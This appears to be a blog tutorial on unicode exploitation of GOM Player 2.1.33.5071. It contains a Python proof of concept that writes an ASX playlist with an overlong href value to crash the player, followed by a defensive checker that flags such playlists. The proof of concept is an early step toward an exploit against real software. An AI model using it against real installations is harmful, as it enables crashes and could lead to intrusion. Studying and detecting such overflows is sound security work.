Landing in a unicode application


After spending some time reading an article about unicode exploitation on corelan.be, let me now try to do it with my own knowledge. Here I'm using the application GOM Player 2.1.33.5071; as we know, it was already exploited several months ago and its exploit can be found here. So I'm using the proof of concept that crashes the application to explain how to build an exploit for it (a unicode application).

Here is the PoC:
#!/usr/bin/python
# ASX playlist wrapper; the overlong value is placed in the href attribute of <ref>
header = '<asx version = "3.0" ><entry><title>Download</title><ref href = "WWW.'
junk = "\x41" * 2046   # 2046 bytes of 'A' (0x41), enough to crash the player
footer = '"/></entry></asx>'

payload = junk

# write the playlist to disk; opening fuzzer.asx in GOM Player triggers the crash
f = open('fuzzer.asx','w')
f.write(header+payload+footer)
f.close()
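To see the crash condition from the other side, here is an added checker (my own example, not code from the original post or from GOM Player) that parses an ASX playlist and flags any <ref href> whose value is suspiciously long before the file reaches a player. It also reports the size the value takes once converted to UTF-16, since that doubling is what a unicode application actually copies into its buffers. The 1024-character threshold, the example.invalid URL and the constructed sample playlists are my assumptions; the second sample is shaped like the PoC above.

```python
#!/usr/bin/env python3
"""Scan an ASX playlist for overlong <ref href> values (added example, not part of the post)."""
import xml.etree.ElementTree as ET

# Assumed threshold: well below the 2046-byte junk string used by the crash PoC,
# but far longer than any realistic media URL.
MAX_HREF_LEN = 1024


def href_lengths(asx_text):
    """Return (href, ascii_len, utf16_len) for every <ref> element.

    utf16_len is the byte size of the value after a UTF-16 conversion: each
    ASCII character becomes two bytes, so a unicode application that copies
    the converted string needs twice the buffer space of the raw file.
    """
    root = ET.fromstring(asx_text)
    results = []
    for ref in root.iter("ref"):
        href = ref.get("href", "")
        results.append((href, len(href), len(href.encode("utf-16-le"))))
    return results


def suspicious_refs(asx_text, max_len=MAX_HREF_LEN):
    """Return the href values whose character length exceeds max_len."""
    return [href for href, n, _ in href_lengths(asx_text) if n > max_len]


# Constructed samples: a benign playlist and one built like the crash PoC.
BENIGN_ASX = ('<asx version="3.0"><entry><title>Clip</title>'
              '<ref href="http://example.invalid/clip.wmv"/></entry></asx>')
POC_ASX = ('<asx version="3.0"><entry><title>Download</title>'
           '<ref href="WWW.' + "A" * 2046 + '"/></entry></asx>')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_ASX), ("poc", POC_ASX)):
        for href, n, n16 in href_lengths(doc):
            verdict = "SUSPICIOUS" if n > MAX_HREF_LEN else "ok"
            print(f"{name}: href is {n} chars / {n16} UTF-16 bytes -> {verdict}")
```

The checker relies on xml.etree, so it only accepts well-formed XML; real-world ASX files are often parsed case-insensitively by players and may need a more tolerant parser, but the length rule itself stays the same.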